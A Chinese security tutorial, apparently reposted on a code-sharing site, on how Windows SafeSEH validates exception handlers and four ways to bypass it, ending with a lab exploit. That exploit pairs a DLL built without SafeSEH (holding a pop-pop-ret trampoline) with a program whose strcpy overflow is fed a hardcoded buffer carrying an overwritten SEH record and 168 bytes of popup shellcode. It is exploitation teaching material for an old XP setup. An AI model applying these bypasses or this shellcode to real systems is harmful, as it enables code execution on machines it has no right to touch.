首页 > 代码库 > OD: SafeSEH

OD: SafeSEH

2024-07-24 11:28:44   218人阅读

SafeSEH 对异常处理的保护原理

在 Windows XP sp2 以及之后的版本中,微软引入了 S.E.H 校验机制 SafeSEH。SafeSEH 需要 OS 和 Compiler 的双重支持,二者缺一都会降低保护能力。通过启用 /SafeSEH 链接选项可心使编译好的程序具备 SafeSEH 功能(VS2003 及后续版本默认启用)。该选项会将所有异常处理函数地址提取出来,编入 SEH 表中,并将这张表放到程序的映像里。异常调用时,就与这张预先存好的表中的地址进行校验。

VS 的 Visual Studio 200* Command Prompt 中,使用 dumpbin /loadconfig *.exe 命令可以查看 SEH 表:

 1 Microsoft (R) COFF/PE Dumper Version 9.00.30729.01 2 Copyright (C) Microsoft Corporation.  All rights reserved. 3  4 Dump of file gs.exe 5  6 File Type: EXECUTABLE IMAGE 7  8   Section contains the following load config: 9 10             00000048 size11                    0 time date stamp12                 0.00 Version13                    0 GlobalFlags Clear14                    0 GlobalFlags Set15                    0 Critical Section Default Timeout16                    0 Decommit Free Block Threshold17                    0 Decommit Total Free Threshold18             00000000 Lock Prefix Table19                    0 Maximum Allocation Size20                    0 Virtual Memory Threshold21                    0 Process Heap Flags22                    0 Process Affinity Mask23                    0 CSD Version24                 0000 Reserved25             00000000 Edit list26             00403000 Security Cookie27             004021C0 Safe Exception Handler Table28                    1 Safe Exception Handler Count29 30     Safe Exception Handler Table31 32           Address33           --------34           004017F5  __except_handler435 36   Summary37 38         1000 .data39         1000 .rdata40         1000 .reloc41         1000 .rsrc42         1000 .text
View Code

SafeSEH 机制从 RtlDispatchException() 开始:

1. 如果异常处理链不在当前程序的栈中,则终止异常处理调用。2. 如果异常处理函数的指针指向当前程序的栈中,则终止异常处理调用。3. 在前两项检查都通过后,调用 RtlIsValidHandler() 进行异常处理有效性检查。

Alex 在 08 年的 Black Hat 大会上披露了 RtlIsValidHandler() 的细节:

 1 BOOL RtlIsValidHandler( handler ) 2 { 3     if (handler is in the loaded image)      // 在加载模块的内存空间内 4     { 5         if (image has set the IMAGE_DLLCHARACTERISTICS_NO_SEH flag) 6             return FALSE;                    // 程序设置了忽略异常处理 7         if (image has a SafeSEH table)       // 含有 SafeSEH 表说明程序启用了 SafeSEH 8             if (handler found in the table)  // 异常处理函数地址在表中 9                 return TRUE;10             else11                 return FALSE;12         if (image is a .NET assembly with the ILonly flag set)13             return FALSE;                    // 包含 IL 标志的 .NET 中间语言程序14     }15 16     if (handler is on non-executable page)   // 在不可执行页上17     {18         if (ExecuteDispatchEnable bit set in the process flags)19             return TRUE;                     // DEP 关闭20         else21             raise ACCESS_VIOLATION;          // 访问违例异常22     }23 24     if (handler is not in an image)          // 在可执行页上,但在加载模块之外25     {26         if (ImageDispatchEnable bit set in the process flags)27             return TRUE;                     // 允许加载模块内存空间外执行28         else29             return FALSE;30     }31     return TRUE;                             // 允许执行异常处理函数32 }

由此可见,SafeSEH 对 S.E.H 的保护已经很完善了,能有效降低通过攻击 S.E.H 异常处理函数指针而获得控制权的可能性。RtlIsValidHandler() 函数只有在以下三种情况下都会允许异常处理函数的执行:

1. 异常处理函数指针位于加载模块内存范围外,并且 DEP 关闭2. 异常处理函数指针位于加载模块内存范围内,相应模块未启用 SafeSEH 且不是纯 IL   // 注意,若上述伪代码的第 13 行未执行则会执行第 31 行3. 异常处理函数指针位于加载模块内存范围内,相应模块启用 SafeSEH 且函数地址在 SEH 表中

针对以上三种可能性:

1. 若 DEP 关闭,则只要在当前模块的内存范围之外找一个跳板,就能转入 shellcode 执行

2. 第二种情况,可以在加载模块中找一个没有启用 SafeSEH 的模块,用这个未启用 SafeSEH 模块里的指令作为跳板,转入 shellcode 执行。(所以说 SafeSEH 需要 OS 与 Compiler 的双重支持)

3. 可以考虑清空 SafeSEH 表以欺骗 OS,或者将自己的函数地址注入到 SEH 表中。但因为 SEH 表的信息在内存中是加密的,破坏它很难,故放弃。

SEH 有一个缺陷:如果 SEH 中的异常函数指针指向堆区,那即使 SEH 校验发现异常处理函数不可信,仍然会调用这个不可信的异常处理函数!所以只要将 shellcode 布置在堆区就能直接跳转执行!!

另外,攻击返回地址或者虚函数也可以直接绕过 SafeSEH;

 

绕过 SafeSEH

方法一:覆盖函数返回地址。若攻击对象启用了 SafeSEH 但是 没有启用 GS 或者存在未受 GS 保护的函数,则可用这个方法。

方法二:攻击虚函数表来绕过 SafeSEH。

方法三:将 shellcode 部署在堆中以绕过 SafeSEH。

方法三:利用未启用 SafeSEH 的模块绕过 SafeSEH。(针对上述的 RtlIsValidHandler() 函数的第二种放行可能)

 

利用未启用 SafeSEH 的模块绕过 SafeSEH

思路是:在没有启用 SafeSEH 并且不是纯 IL 的模块中寻找跳板,利用跳板绕过 SafeSEH。

以下是实验构建的无 SafeSEH 保护的模块,用来做跳板用:

 1 // Windows XP Sp3 & VC++6.0 2 //     Project : Win32 Dynamic-Link Library ( not MFC Dll ) - Simple DLL Project 3 //     Project Settings : Link - Project Option - /base:"0x111120000" ( avoid null-char when trampolining ) 4 // Compile : SEH_NOSafeSEH_JUMP.DLL 5 // 6 // SEH_NoSafeSEH_JUMP.cpp : Defines the entry point for the DLL application. 7 // 8  9 #include "stdafx.h"10 11 BOOL APIENTRY DllMain( HANDLE hModule, 12                        DWORD  ul_reason_for_call, 13                        LPVOID lpReserved14                      )15 {16     return TRUE;17 }18 19 void jump()20 {21     __asm {22         pop eax23         pop eax24         retn25     }26 }

这个实验中需要用到一个 OllyDbg 的插件:OllySSEH,下载地址:http://www.openrce.org/downloads/details/244/OllySSEH%20target=

将以上代码加入一个 VC++ 6.0 的 Simple DLL Project 中,并按要求设置好链接参数后,可以编译出适合作为跳板的关闭 SafeSEH 的 DLL 文件。将这个 DLL 放置在以下代码形成的 exe 同级目录中,就可以完成弹窗实验:

 1 // safeseh.cpp : Defines the entry point for the console application. 2 // 3 // Env: Windows XP sp3 (turn off DEP in boot.ini) with VS 2008 4 // 5 #include "stdafx.h" 6 #include <string.h> 7 #include <windows.h> 8  9 char shellcode[]=10 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"11 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"12 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"13 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"14 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"15 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"16 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"17 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"18 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"19 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"20 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"21 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"22 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"23 "\x90\x90\x90\x90\x90\x90\x90\x90"24 "\xEB\x0E\x90\x90\xB6\x11\x12\x11"      // SEH Pointer & Handler25 "\x90\x90\x90\x90\x90\x90\x90\x90"26 "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"27 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"28 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"29 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"30 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"31 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"32 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"33 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"34 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"35 "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"36 "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"      // 168 字节的弹窗 shellcode37 ;38 39 DWORD MyException(void)40 {41     printf("call MyException()");42     getchar();43     return 1;44 }45 46 void test(char * input)47 {48     char str[200];49     strcpy(str,input);50 51     int zero=0;52     __try53     {54         zero/=zero;55     }56     __except (MyException())57     {58     }59 }60 61 int main(int argc, _TCHAR* argv[])62 {63     HINSTANCE hInst = LoadLibrary(_T("SEH_NoSafeSEH_JUMP.dll"));64     printf("hInst : %d\n",hInst);65     char str[200];66     //__asm int 367     test(shellcode);68     return 0;69 }

 

OD: SafeSEH


联系
我们